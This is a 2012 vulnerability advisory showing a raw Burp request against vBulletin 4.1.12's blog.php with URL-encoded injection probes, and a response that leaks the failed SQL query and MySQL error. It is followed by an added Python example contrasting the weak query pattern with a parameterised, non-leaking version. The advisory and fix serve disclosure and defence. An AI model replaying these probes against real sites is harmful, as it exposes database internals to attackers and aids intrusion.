[ TITLE ....... ][ vBulletin 4.1.12 - sql information leak (for logged-in users)
[ DATE ........ ][ 03.05.2012
[ AUTHOR ...... ][ http://hauntit.blogspot.com
[ SOFT LINK ... ][ http://www.vbulletin.com
[ VERSION ..... ][ 4.1.12
[ TESTED ON ... ][ LAMP
[ -----------------------------------------------------------------------
[
[ 1. What is this?
[ 2. What is the type of vulnerability?
[ 3. Where is bug :)
[ 4. More...
[--------------------------------------------[
[ 1. What is this?

This is a very nice CMS, you should try it! ;)

[--------------------------------------------[
[ 2. What is the type of vulnerability?

[--------------------------------------------[
[ 3. Where is bug :)

--- raw from burp ---

---raw-from-Burp---
POST /www/22o4/highz/las/blog.php?b=[%2fhtml][html]"%3e%3cimg%20src%3dx%20onerror%3d(1231234444444)%3b%3e[%2fhtml][%2fhtml][html]"%3e%3cimg%20src%3dx%20onerror%3d(1231234444444)%3b%3e[%2fhtml][%2fhtml][html]"%3e%3cimg%20src%3dx%20onerror%3d(1231234444444)%3b%3e[%2fhtml]&vote=[%2fhtml][html]"%3e%3cimg%20src%3dx%20onerror%3d(1231234444444)%3b%3e[%2fhtml][%2fhtml][html]"%3e%3cimg%20src%3dx%20onerror%3d(1231234444444)%3b%3e[%2fhtml][%2fhtml][html]"%3e%3cimg%20src%3dx%20onerror%3d(1231234444444)%3b%3e[%2fhtml] HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:12.0) Gecko/20100101 Firefox/12.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://localhost/www/22o4/highz/las/entry.php?2-html-quot-gt-lt-img-src-xxx-onerror-alert(9999)-gt-html
Cookie: skimlinks_enabled=1; vbulletin_userlist_hide_avatars_buddylist=0; editor_height=cms_article%23207px; bb_lastvisit=1335789702; bb_lastactivity=0; bb_sessionhash=bcf4631bc0ea002087ded92c796ac79a; bb_userstyleid=1; bb_skipmobilestyle=0; bb_thread_lastview=7aeffb9e62242afd6746ab9c8bcb589269ddf416a-1-%7Bi-121_i-1335789759_%7D; bb_forum_view=0ca42d3e5b599ba0a771e794d5098040cf6497cba-3-%7Bi-3_i-1335862432_i-2_i-1336034464_i-1_i-1336034445_%7D; bb_calendar=e2e67b4d0ec6ed855d66d62b21910a6cf6af50d6a-3-%7Bs-7-.calyear._i-2012_s-8-.calmonth._i-5_s-8-.calview1._s-12-.displaymonth._%7D; bb_blog_lastview=47cf4ac63a62d3c29c6a536323fa891bc5b8cd46a-1-%7Bi-2_i-1336037033_%7D
Pragma: no-cache
Cache-Control: no-cache
Content-Length: 630
Connection: close

ajax=1&s=&securitytoken=1336037033-b3ba5f3786a6e5e260d2c6ccde476dd5bde7dc4d&vote=[%2fhtml][html]"%3e%3cimg%20src%3dx%20onerror%3d(1231234444444)%3b%3e[%2fhtml][%2fhtml][html]"%3e%3cimg%20src%3dx%20onerror%3d(1231234444444)%3b%3e[%2fhtml][%2fhtml][html]"%3e%3cimg%20src%3dx%20onerror%3d(1231234444444)%3b%3e[%2fhtml]&s=&securitytoken=1336037033-b3ba5f3786a6e5e260d2c6ccde476dd5bde7dc4d&do=rate&b=[%2fhtml][html]"%3e%3cimg%20src%3dx%20onerror%3d(1231234444444)%3b%3e[%2fhtml][%2fhtml][html]"%3e%3cimg%20src%3dx%20onerror%3d(1231234444444)%3b%3e[%2fhtml][%2fhtml][html]"%3e%3cimg%20src%3dx%20onerror%3d(1231234444444)%3b%3e[%2fhtml]&

---and-HTTP-answer---
HTTP/1.1 200 OK
Date: Thu, 03 May 2012 09:26:51 GMT
Server: Apache/2.2.17 (Ubuntu)
X-Powered-By: PHP/5.3.5-1ubuntu7.7
Vary: Accept-Encoding
Connection: close
Content-Type: text/xml; charset=windows-1252
X-Pad: avoid browser bug
Content-Length: 1650

Database Error

Database error in vBulletin 4.1.12 Beta 1

Invalid SQL: REPLACE INTO blog_visitor (userid, visitorid, dateline, day, visible) VALUES ( , 2, 1336037212, 1335909600, 1 );

MySQL Error : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ' 2, 1336037212, 1335909600, 1 )' at line 5
Error Number : 1064
Request Date : Thursday, May 3rd 2012 @ 11:26:52 AM
Error Date : Thursday, May 3rd 2012 @ 11:26:56 AM
Script : http://localhost/www/22o4/highz/las/blog.php?b=[%2fhtml][html]"%3e%3cimg%20src%3dx%20onerror%3d(1231234444444)%3b%3e[%2fhtml][%2fhtml][html]"%3e%3cimg%20src%3dx%20onerror%3d(1231234444444)%3b%3e[%2fhtml][%2fhtml][html]"%3e%3cimg%20src%3dx%20onerror%3d(1231234444444)%3b%3e[%2fhtml]&vote=[%2fhtml][html]"%3e%3cimg%20src%3dx%20onerror%3d(1231234444444)%3b%3e[%2fhtml][%2fhtml][html]"%3e%3cimg%20src%3dx%20onerror%3d(1231234444444)%3b%3e[%2fhtml][%2fhtml][html]"%3e%3cimg%20src%3dx%20onerror%3d(1231234444444)%3b%3e[%2fhtml]
Referrer : http://localhost/www/22o4/highz/las/entry.php?2-html-quot-gt-lt-img-src-xxx-onerror-alert(9999)-gt-html
Classname : vB_Database
MySQL Version :

---raw-from-Burp---

--- Enjoy ;)

[--------------------------------------------[
[ 4. More...

- http://hauntit.blogspot.com
- http://www.google.com
- http://portswigger.net
[
[--------------------------------------------[
[ Questions? Mail me. ]
[ Cheers! o/ [
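The detail worth a defender's attention in the leaked statement above is the empty first value (`VALUES ( , 2, ...`): it reads as the blog owner's userid being pasted into the SQL unquoted after a lookup on the bogus `b` parameter found nothing, after which the error handler hands the whole failed query, with table and column names, to a logged-in user. The Python/sqlite3 snippet below is an added illustration, not vBulletin's code, and that reading of the cause is an assumption; the table layout and the sample row are constructed. It puts the assumed weak pattern next to a version that validates the id before touching the database, binds every value, and keeps the engine's error in the server log instead of the response.

```python
import logging
import re
import sqlite3

log = logging.getLogger("blog")


def make_db() -> sqlite3.Connection:
    """Constructed in-memory stand-in for the two tables the leaked query involves."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE blog (blogid INTEGER PRIMARY KEY, userid INTEGER NOT NULL);
        CREATE TABLE blog_visitor (
            userid INTEGER, visitorid INTEGER, dateline INTEGER, day INTEGER, visible INTEGER,
            PRIMARY KEY (userid, visitorid)
        );
        INSERT INTO blog VALUES (1, 7);   -- constructed sample: blog 1 is owned by user 7
    """)
    return db


def _owner_of(db: sqlite3.Connection, blogid):
    """Return the owner's userid for a blog id, or None if no such blog exists."""
    row = db.execute("SELECT userid FROM blog WHERE blogid = ?", (blogid,)).fetchone()
    return row[0] if row else None


def weak_record_visit(db: sqlite3.Connection, b: str, visitor: int, now: int, day: int) -> str:
    """Assumed weak pattern, reconstructed from the leaked statement in the advisory:
    the owner id is interpolated unquoted, so when the lookup on 'b' finds nothing the
    slot is empty ("VALUES ( , 2, ..."), the statement fails, and the handler echoes
    the failed SQL plus the engine's message straight back to the client."""
    owner = _owner_of(db, b)
    owner_text = "" if owner is None else str(owner)
    sql = ("REPLACE INTO blog_visitor (userid, visitorid, dateline, day, visible) "
           f"VALUES ( {owner_text}, {visitor}, {now}, {day}, 1 )")
    try:
        db.execute(sql)
        db.commit()
    except sqlite3.Error as e:
        # This is the leak: internal query text and engine error reach the browser.
        return f"Database Error\n\nInvalid SQL: {sql};\n\nSQL Error : {e}"
    return "OK"


def safe_record_visit(db: sqlite3.Connection, b: str, visitor: int, now: int, day: int) -> str:
    """Hardened version: reject anything that is not a plain positive integer id before
    any query runs, bind the values, and log database detail server-side only."""
    if not re.fullmatch(r"[1-9][0-9]{0,9}", b):
        return "Invalid blog id"
    owner = _owner_of(db, int(b))
    if owner is None:
        return "No such blog"
    try:
        db.execute(
            "REPLACE INTO blog_visitor (userid, visitorid, dateline, day, visible) "
            "VALUES (?, ?, ?, ?, 1)",
            (owner, visitor, now, day),
        )
        db.commit()
    except sqlite3.Error as e:
        log.error("blog_visitor write failed for blog %s: %s", b, e)  # detail stays in the log
        return "Database Error"  # generic message only; nothing about the query
    return "OK"


if __name__ == "__main__":
    db = make_db()
    # Constructed input in the same shape as the advisory's 'b' parameter (URL-decoded).
    hostile = '[/html][html]"><img src=x onerror=(1231234444444);>[/html]'
    print(weak_record_visit(db, hostile, 2, 1336037212, 1335909600))
    print(safe_record_visit(db, hostile, 2, 1336037212, 1335909600))
    print(safe_record_visit(db, "1", 2, 1336037212, 1335909600))
```

The two changes that matter are independent: binding the values removes the syntax error path entirely, and returning a fixed message removes the leak even if some other statement still fails. A generic "Database Error" with the detail in the server log is what a client should ever see.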